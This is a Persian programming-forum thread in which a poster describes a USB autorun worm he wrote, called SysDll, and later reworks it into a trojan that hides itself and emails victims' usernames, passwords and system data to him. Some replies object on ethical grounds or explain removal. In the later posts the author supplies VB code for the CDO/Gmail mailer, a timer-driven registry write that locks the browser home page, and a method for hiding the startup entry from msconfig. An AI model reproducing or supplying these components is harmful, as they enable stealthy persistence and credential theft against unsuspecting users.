سلام دوستان برنامه نویس عزیز.
میخاستم در مورد ویروسی که از مدتی قبل روش کار میکردم باهاتون صحبت کنم . حتما نظرات شما میتونه به من کمک زیادی بکنه.
نام ویروس : SysDll
درجه خطرناک بودن : -----
نحوه پخش : به کمک فایل Autorun.inf در ریشه همه درایوهای سیستم، کول دیسک، مموری و هر حافظه دیگری که به سیستم متصل بشه.
طریقه نابود کردن ویروس : فرمت کردن کل هارد دیسک( بازم راه داره )

کارهایی که ویروس انجام میده : این ویروس نیازی به اجرا کردن فایل خاصی نداره کافیه که شما برای مثال کول دیسک خودتون رو برای حتی یک ثانیه به سیستم آلوده به این ویروس متصل کنید. پس از آن یک فایل به نام Sysdll.exe به همراه فایل autorun.inf در ریشه درایو کول دیسک شما کپی میشه. هر دوی این فایلها به صورت سیستمی و هیدن هستند و شما در حالت عادی نمیتونید اونها رو مشاهده کنید. پس وارد کردن کول دیسک در سیستم خودتون فقط کافیه که وارد کول دیسک بشید. البته این به این معنی نیست که حتما باید دوبار کلیک بکنید روی درایو تا ویروس اجرا بشه، حتی اگر راست کلیک کنید و گزینه های Open یا Explorer رو انتخاب کنید این ویروس روی سیستم شما فعال میشه.
خوب از اینجا به بعد اختیار سیستم شما به طور کامل به ویروس واگذار میشه. در همون ابتدا Msconfig و Registery شما غیر فعال میشه تا فکر غیر فعال کردنش از ذهنتون بیرون بیاد. بعد ویروس یک نسخه از خودش رو توی یکی از پوشه های ویندوز کپی میکنه و رجیستری رو طوری نتظیم میکنه که هرموقع ویندوز بالا اومد اونو از همین مسیر اجرا کنه. بعد میره کل درایوهای سیستم رو چک میکنه که اگر فایل ویروس و autorun.inf اونجا نبود یک نسخه ازش سریعا اوجا کپی کنه ( همه این کارها در کسری از ثانیه انجام میگیره ) خوب حالا ویروسمون وارد مرحله جدیدی میشه. تقریبا توی هر 30 ثانیه کل هارد اسکن میشه و اگه فایلی با پسوند jpg یا jpeg پیدا شد اون عکس رو به عکسی که از قبل خودم تعیین کردم تبدیل میکنه ( در واقع سورس اون فایل مبدا رو باز میکنه و سورس عکسی که از قبل خودم آماده کردم رو به اول اون عکسه اضافه میکنه و فایل رو همونجا میبنده ) اینجوری همه عکسهای اون سیستم به یه عکس خاص تبدیل میشه ( چقدر وحشتناک !!! ) همینجور در مورد فایلهای MP3 .... . والپیپر ویندوز هم به همون عکس تبدیل میشه و برگه Desktop در Display Propertis غیب میشه. البته اگه از راههای دیگه والپیپیر تغییر کنه ظرف کمتر از یک ثانیه دوباره عوض میشه.
مزیت دیگر این ویروس اینه که اصلا وقت Cpu رو بابت این عملیاتهای پی در پی نمیگیره.
از این به بعد حتی اگر ویندوز رو هم عوض کنید به محض ورود به هر یک از درایوها روز از نو و روزی از نو !!!
راستی یادم رفت بگم Home Page مرورگر هم به صورت غیر قابل تغییر به سایت خودم تغییر میکنه ( www.karshenasi.com (http://www.karshenasi.com) )
اگه سوالی، نظری، چیزی داری بگید. انشا الله وقتی کامل شد سورسش رو همینجا قرار میدم

سلام
به این میگن بی جنبه بودن
حال می خواین ویروس نویسی رو تمرین کنید
حتما باید بزنید بدترین کارهای ممکن (و البته ساده ترین کارها که انجامش هنر نیست) رو روی سیستم طرف انجام بدین ؟
میگم فرمتش هم کنید بد نیست ها
درسته برنامه نویس هستین
اما اول باید اخلاق برنامه نویسی داشته باشین

ویروس نویسی یعنی ابتکار نه تقلید ... !!!

ویروس نویسی یعنی ابتکار نه تقلید ... !!!

میشه بگید تقلید از کی ؟

این بد افزار توسط آنتی ویروسها قابل شناسایی هست ؟

این بد افزار توسط آنتی ویروسها قابل شناسایی هست ؟
خیر، من با همه انتی ویروسها تست کردم، پیداش نمیکنند ..

من با کاسپر اسکای 7 پیداش کردم
چندان خطرناک نیست
زیاد جدی نگیرید

من با کاسپر اسکای 7 پیداش کردم
چندان خطرناک نیست
زیاد جدی نگیرید

چی رو پیدا کردید؟
ویروس من رو ؟؟؟؟ :لبخند:

oooooooooooooooooooo ببخشید
ولی طرز کار ویروس شبیه ویروسهای این خانواده هست که مشابه رو با کاسپر اسکای گرفتمش

یک مساله دیگه شما که میگید هیچ نوع ویروس اسکنی نگرفته این بدین معنی هست که شما ویروس ننوشتید شما یک برنامه نوشتید که خودم کداشو دارم و همین طور محلهای رجیستری رو

چند وقت پیش کدی رو از سایتی گرفتم که داخل یک فایل متنی ذخیره کردم، کاسپر اسکای به همون فایل متنی گیر داد و آخرشم پاکش کرد
می بینید که این ویروس نه برنامه شما

از سایتتونم استفاده بردیم
تشکر

وقتی ویروس شما می زنه Msconfig و Regsitry و Task Manager رو غیر فعال می کنه انتظار داری دیگه کاربر راضی باشه با اون ویندوز کار کنه ؟ خوب 100% به جای اینکه به زور شاهد ورود به سایت Karshenasi.com باشه میره ویندوزش رو عوض می کنه . و یک چیزه دیگه : فرمت کردن کل هارد دوای درد ویندوز در برابر ویروس هایی که با VB می نویسید نیست .

یه پیشنهاد هم براتون دارم : اگر هدفتون تبلیغاته بهتره از تخریب صرف نظر کنید .

اینجوری همه عکسهای اون سیستم به یه عکس خاص تبدیل میشه ( چقدر وحشتناک !!! )خودت می بری و خودت هم می دوزی ؟!

پسر خوب به این نمیگن ویروس، بیشتر شبیه کرمه. ضمن اینکه اصلا خطرناک نیست و راه حلش هم فرمت کردن هارد نیست ... فقط با یه Safe Mode میشه برای همیشه ساقطش کرد.

اما به عنوان یه نصیحت... اون موقع که شما احتمالا هنوز مفهوم دقیق ویروس نمی دونستی من توی Dos 6.2 با اسمبلی عهد بوق، ویروس های Exe و Com و Boot Sector می نوشتم و کلی ذوق میکردم و در آخر نتیجه اش هم این شد که پروژه پایان دوره کاردانی رو قفل نرم افزاری روی بوت سکتورهای فلاپی انتخاب کردم.
یه مدت که گذشت رفتم روی کرک و شکستن قفل برنامه و بعدش هم عضو گروه معروف هکینگ شدم و سایت ملت رو می فرستادم هوا....
اما عجیب بود که حتی یک ریال هم کف دستم نذاشتن و تمام دوستام یه گوشه و یه جایی استخدام شدن و برنامه های خفن خن نوشتن و من همچنان اندر خم یک کوچه بودم...
خیلی مواظب باش... اینها همش شور جوونیه و حتی یک ریال هم ارزش نداره... خراب کردن و نفرین مردم رو خریدن در هیچ کجای دنیا ارزش نداره... چه توی ایران و چه توی افغانستان

خیلی مواظب باش... اینها همش شور جوونیه و حتی یک ریال هم ارزش نداره... خراب کردن و نفرین مردم رو خریدن در هیچ کجای دنیا ارزش نداره... چه توی ایران و چه توی افغانستان
افشین جان، دوستمون فقط درباره برنامش (ویروسش؟!) نظر میخواست، نه کار ویروس نویسی و خودش و آینده اش و ...!

البته درباره برنامه karshenasi، شما اگر دوست دارین بحث فنی کنید که جای بحثتون درسته، ولی اگر میخواین ازتون تعریف کنیم که قضیه فرق میکنه! آخه با خوندن توضیحاتت احساس کردم با غلو کردن درباره برنامه داری بحث رو از حالت فنی در میاری و آماده کل کل میکنی که بعدش دوستانی مثل آقای زوار مجبور میشن بجای اینکه درباره برنامه نظر بدن، بحثهای حاشیه ای مطرح کنن. مثلا اینها رو ببین:

درجه خطرناک بودن : Very Scary توسط کجا درجه بندی شده؟

طریقه نابود کردن ویروس : فرمت کردن کل هارد دیسک!!!!!!!!!!!!

کافیه که شما برای مثال کول دیسک خودتون رو برای حتی یک ثانیه به سیستم آلوده به این ویروس متصل کنید. میدونی که ویندوز XP SP2 که اکثرا تو ایران استفاده میشه، Autorun مربوط به flash memory رو تا روش کلیک نکنی اجرا نمیکنه.

هر دوی این فایلها به صورت سیستمی و هیدن هستند و شما در حالت عادی نمیتونید اونها رو مشاهده کنید.بقیه رو نمیدونم، اما من و اکثر کسانی که میشناسم، تنظیمات Folder Options رو برای دیدن این فایل ها تنظیم میکنن.

البته این به این معنی نیست که حتما باید دوبار کلیک بکنید روی درایو تا ویروس اجرا بشه، حتی اگر راست کلیک کنید و گزینه های Open یا Explorer رو انتخاب کنید این ویروس روی سیستم شما فعال میشه.اگر تو Address Bar آدرس رو تایپ کنیم چطور؟

در همون ابتدا Task Manager ، Msconfig و Registery شما غیر فعال میشه تا فکر غیر فعال کردنش از ذهنتون بیرون بیاد.با استفاده از ابزارهایی مثل این (http://www.imenantivirus.com/RegRepair.zip)چطور؟ باز هم فکرش از ذهنمون بیرون بیاد؟

اینجوری همه عکسهای اون سیستم به یه عکس خاص تبدیل میشه ( چقدر وحشتناک !!! )وحشتناک یا بدون اخلاق؟ (هر کاری یه فرهنگ و اخلاقی داره، ویروس نویسی هم همینطوره)

مزیت دیگر این ویروس اینه که اصلا وقت Cpu رو بابت این عملیاتهای پی در پی نمیگیره.چطوری؟ فکر کنم منظورتون این بود که خیلی کم CPU رو مشغول نگه میداره. نه اینکه اصلا وقت نمیگیره! (اینجا بازاریابی که نمیکنیم. همه هم میدونیم کامپیوتر چطور کار میکنه!)

از این به بعد حتی اگر ویندوز رو هم عوض کنید به محض ورود به هر یک از درایوها روز از نو و روزی از نو !!!و البته خیلی باید ببو باشیم که ویندوز رو عوض کنیم و (حداقل) فایل های Autorun رو پاک نکنیم.

راستی یادم رفت بگم Home Page مرورگر هم به صورت غیر قابل تغییر به سایت خودم تغییر میکنهپیشنهاد میکنم برای اینکه آبروی سایتتون نره (به خاطر مردم آزاری)، یا یه سایت دیگه مخصوص ویروس نویسی رجیستر کنین و Home Page رو به اون تبدیل کنید و یا اینکه این مورد رو بیخیال شی و یا اینکه حداقل فایلهای کامپیوتر رو خراب نکنی.

اگه سوالی، نظری، چیزی داری بگید. انشا الله وقتی کامل شد سورسش رو همینجا قرار میدممهمترین نظری که دارم اینه که فکر میکنم اگر به جای خرابکاری بیشتر، یه ذره خلاقیت بیشتر (مثلا در مورد کشف نشده ویروس) انجام بدی، خیلی بهتره از اینکه کار ویروسهای مشابه رو تکرار کنی. (البته فقط به عنوان پیشنهاد)

شاید جای بحث ویروسها اینجا نباشه ولی جهت اگاهی دوستان عرض کنم اگه fat درایوهاتون
ntfs باشه هیچ کدام از این نمونه برنامه ها روی هارد کپی نمیشه خیلی راحت از دست اینها خلاص میشین

وقتی ویروس شما می زنه Msconfig و Regsitry و Task Manager رو غیر فعال می کنه انتظار داری دیگه کاربر راضی باشه با اون ویندوز کار کنه ؟ خوب 100% به جای اینکه به زور شاهد ورود به سایت Karshenasi.com باشه میره ویندوزش رو عوض می کنه . و یک چیزه دیگه : فرمت کردن کل هارد دوای درد ویندوز در برابر ویروس هایی که با VB می نویسید نیست .

یه پیشنهاد هم براتون دارم : اگر هدفتون تبلیغاته بهتره از تخریب صرف نظر کنید .

درسته، حق با شماست
چون یک ویروس خوب باید طوری توی سیستم قربانی عمل کنه که کاربر متوجه وجودش نشه
خوب من هم Task manager رو غیر فعال نمیکنم و به جاش اسم افایل ویروس رو از لیست پروسس ها مخفی میکنم
در مورد خراب کردن فایلها هم شما راست میگید
هر چند که اون فایلها قابل بازگشت هستند اما بهتره این بخش هم حذف بشه تا آسیب رسوندن به کاربر به حداقل برسه
برای من پخش شدن ویروس مهمتر از اذیت شدن کار بر هست





پسر خوب به این نمیگن ویروس، بیشتر شبیه کرمه. ضمن اینکه اصلا خطرناک نیست و راه حلش هم فرمت کردن هارد نیست ... فقط با یه Safe Mode میشه برای همیشه ساقطش کرد.

اما به عنوان یه نصیحت... اون موقع که شما احتمالا هنوز مفهوم دقیق ویروس نمی دونستی من توی Dos 6.2 با اسمبلی عهد بوق، ویروس های Exe و Com و Boot Sector می نوشتم و کلی ذوق میکردم و در آخر نتیجه اش هم این شد که پروژه پایان دوره کاردانی رو قفل نرم افزاری روی بوت سکتورهای فلاپی انتخاب کردم.
یه مدت که گذشت رفتم روی کرک و شکستن قفل برنامه و بعدش هم عضو گروه معروف هکینگ شدم و سایت ملت رو می فرستادم هوا....
اما عجیب بود که حتی یک ریال هم کف دستم نذاشتن و تمام دوستام یه گوشه و یه جایی استخدام شدن و برنامه های خفن خن نوشتن و من همچنان اندر خم یک کوچه بودم...
خیلی مواظب باش... اینها همش شور جوونیه و حتی یک ریال هم ارزش نداره... خراب کردن و نفرین مردم رو خریدن در هیچ کجای دنیا ارزش نداره... چه توی ایران و چه توی افغانستان
شرمنده استاد
ما قصد جسارت نداشتیم
این جور برنامه ها هم فکر نمیکنم اونقدرا ذوق و شوق داشته باشه که بخاییم براش بالا و پایین بپریم ولی مهم اینه که به کمک همین برنامه ها خود من چیزای زیادی یاد گرفتم




پیشنهاد میکنم برای اینکه آبروی سایتتون نره (به خاطر مردم آزاری)، یا یه سایت دیگه مخصوص ویروس نویسی رجیستر کنین و Home Page رو به اون تبدیل کنید و یا اینکه این مورد رو بیخیال شی و یا اینکه حداقل فایلهای کامپیوتر رو خراب نکنی.

والا به خدا من قصدم مردم آزاری و این حرفا نیست
اون قسمت ویروس که باعث خرابی فایلها میشد رو هم حذف کردم
ولی خوب یه چیزایی رو هم باید در نظر داشت که آیا همه کاربران کامپیوتر مثل شما برنامه نویس و حرفه ایی هستند ؟

والا به خدا من قصدم مردم آزاری و این حرفا نیست
اون قسمت ویروس که باعث خرابی فایلها میشد رو هم حذف کردم
ولی خوب یه چیزایی رو هم باید در نظر داشت که آیا همه کاربران کامپیوتر مثل شما برنامه نویس و حرفه ایی هستند ؟

من که خودم قبل از حرفام گفتم که فقط چون شما یکمی غلو کردین، من اینجوری مطرح کردم.

میشه بگین چطوری home page رو کاری کردین نتونه کسی تغییر بده ؟

ولی خوب یه چیزایی رو هم باید در نظر داشت که آیا همه کاربران کامپیوتر مثل شما برنامه نویس و حرفه ایی هستند ؟

این حرف شما درسته ولی همیشه سعی کن کاربر رو از خودت باهوش تر بدونی ، چون فقط در این صورت می تونی ویروس قدرتمندی بنویسی ...

موفق باشی :قلب:

جناب Some_Coder شما چی از ویروس نویسی میدونی ؟ خیلی دوست دارم به ما هم کمک کنی ...

نظر من:
این ویروس(!) روی ویستا جواب نمیده.
مرامنامه ویروس نویسی میگه هدف از نوشتن ویروس نمایش نقاط ضعف به کاربرا و توسعه دهندگان نرم افزار هاست آخه پاک کردن عکسای سیستم قربانی چه نفعی برای شما داره مخصوصا اگه غیر قابل بازگشت باشه
شما msconfig و registery رو بستید با system restore چی کار می کنید؟؟
طرز کار ویروستون خیلی (دقیقا) شبیه ویروس autorun هست که از پروسس temp1.exe و temp2.exe برای باز سازی فایلای autorun و ...(دو تا فایل دیگه بود که اسمشونو یادم نمیاد)که تو ریشه درایوا می ساخت استفاده می کرد.

راستش عملکرد این ویروس یا تروجان رو کلا تغییر دادم
شما راست میگید چون وقتی یه لحظه خودم رو جای طرف قرار دادم ...........
دیگه هیچ عکس یا فایلی از کاربر آسیب نمیبیه و Task Manager، Registery و Msconfig هم غیر فعال نمیشه
در عوض پروسس این تروجان در Task Manager مخفی میمونه. دستور StartUp فایل تروجان در رجیستری هم وجود داره اما مخفی. طوری که در Msconfig هم نمایش داده نمیشه
وقتی که کاربر به اینترنت متصل بشه کلیه اطلاعات سیستمش از قبیل نام کامپیوتر، یوزر ، CPU ، Ram ، Hard Disk و یه سری اطلاعت دیگه به همراه UserName و Password و شماره تلفن کلیه Connection های اینترنت رو به ایمیل من میفرسته
البته چون من از Adsl استفاده میکنم، این اکانتهای Dial Up به هیچ درد من نمیخوره.

میشه طریقه ارسال ایمیل رو توضیح بدی ؟

میشه طریقه ارسال ایمیل رو توضیح بدی ؟

برای ارسال ایمیل به صورت زیر میشه عمل کرد. ابتدا تابع زیر رو به برنامه اضافه کنید



'start SendMail code
Function SendMail(Sender As String, Subject As String, Reciever As String, Text As String, Password As String, AttachFile As String) As Boolean
If Sender <> "" Or Password <> "" Then
Dim iMsg, iConf, Flds, schema, SendEmailGmail
Set iMsg = CreateObject("CDO.Message")
Set iConf = CreateObject("CDO.Configuration")
Set Flds = iConf.Fields

' send one copy with Google SMTP server (with autentication)
schema = "http://schemas.microsoft.com/cdo/configuration/"
Flds.Item(schema & "sendusing") = 2
Flds.Item(schema & "smtpserver") = "smtp.gmail.com"
Flds.Item(schema & "smtpserverport") = 465
Flds.Item(schema & "smtpauthenticate") = 1
Flds.Item(schema & "sendusername") = Sender
Flds.Item(schema & "sendpassword") = Password
Flds.Item(schema & "smtpusessl") = 1
Flds.Update

With iMsg
DoEvents
.To = Reciever
.From = Sender
.Subject = Subject
.HTMLBody = Text
.Sender = Sender
.Organization = "S.M.B Productions"
.ReplyTo = Sender
If AttachFile <> "" Then
.AddAttachment (AttachFile)
End If
Set .Configuration = iConf
SendEmailGmail = .Send
End With

Set iMsg = Nothing
Set iConf = Nothing
Set Flds = Nothing
frmMain.MousePointer = 0
SendMail = True
Else
SendMail = False
End If
End Function
'end SendMail code

سپس قسمتهای لازم رو در خط زیر جایگذین کنید



Send = mdlMail.SendMail("test@gmail.com", "Subject ... ", "test@yahoo.com", "matne name ersali shoma", "password", "")


البته حتما باید برای ارسال نامه توسط این کد یک اکانت Gmail داشته باشید چون کد بالا از سرور رایگان گوگل برای ارسال ایمیل استفاده میکنه. ایمیل اولی همون اکانت گوگلتون هست که در واقع از طریق اون، ایمیل ارسال میشه. قسمت دوم عنوان ایمیل هست. قست سوم آدرس ایمیلیه که قراره نامه به دستش برسه. در قسمت بعدی متن نامه قرار میگیره و بعدش پسورد اکانت Gmail شما و در آخر هم اگه مایل بودید فایلی ضمیمه نامه بشه، آدرس اون فایل رو در کوتیشنهای آخر قرار بدید.
موفق باشید

دوست من چرا جواب من رو ندادین که چطوری کاری کردین که Home page همیشه یک آدرس بمونه

دوست من چرا جواب من رو ندادین که چطوری کاری کردین که Home page همیشه یک آدرس بمونه

از طریق کد رجیستری زیر میشه این کار رو انجام داد

SetStringValue "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "http://www.karshenasi.com"

این کد رو بگذارید توی تایمر با مقدار Interval مثلا 10 میلی ثانیه

.
.
.
در عوض پروسس این تروجان در Task Manager مخفی میمونه. دستور StartUp فایل تروجان در رجیستری هم وجود داره اما مخفی. طوری که در Msconfig هم نمایش داده نمیشه
.
.
.

منم یه سوال داشتم :میشه بگید ویروستون رو چطوری لود می کنید که تو msconfig نشون نمیده و چه طوری تو رجیستری مخفیش کردید ...یعنی از کلید زیر استفاده نکردید:


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run

یا معادلش برای HKEY_CURRENT_USER.
بعد منظورتون از مخفی کردن در task manager همون سربرگ processes هست یا applications؟

ویروس رو آپلود کنید
ببینم چیه؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

برای ارسال ایمیل به صورت زیر میشه عمل کرد. ابتدا تابع زیر رو به برنامه اضافه کنید


موفق باشید

با تشکر زیاد از زحمتی که کشدید ...

اگه امکان داره اسم کنترل های استفاده شده در برنامه رو هم نام ببرید . :قلب:

منم یه سوال داشتم :میشه بگید ویروستون رو چطوری لود می کنید که تو msconfig نشون نمیده و چه طوری تو رجیستری مخفیش کردید ...یعنی از کلید زیر استفاده نکردید:


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run

یا معادلش برای HKEY_CURRENT_USER.


برای مخفی کردن در Msconfig کافیه نام برنامه رو بعد از آدرس رجیستری زیر رو پاک کنید



HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig

در مورد مخفی کردن در Registery هم بعد از قطعی شدن خدمتتون عرض میکنم چون فعلا برای من هنوز توی VB جواب نمیده



بعد منظورتون از مخفی کردن در task manager همون سربرگ processes هست یا applications؟

هردوتاش

با تشکر زیاد از زحمتی که کشدید ...

اگه امکان داره اسم کنترل های استفاده شده در برنامه رو هم نام ببرید . :قلب:
وقتی کامل شد سورس کل برنامه رو براتون میفرستم

آقا پیمان منظورم کنترل های مورد استفاده برای ارسال ایمیل بود .

دوستان برای استفاده از استارت آپ نیازی نیست از
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run
استفاده کنید
باید از استارت آپ هایی استفاده کنید که هر کسی بلد نباشه

سلام . karshenasi عزیز میشه بگید اطلاعات سیستم فربانی به چه دره شما میخوره؟؟؟؟!!

من نظرم اینه که این تایپیک رو ببندبد چون شده کل کل برنامه نویسا
با تشکر...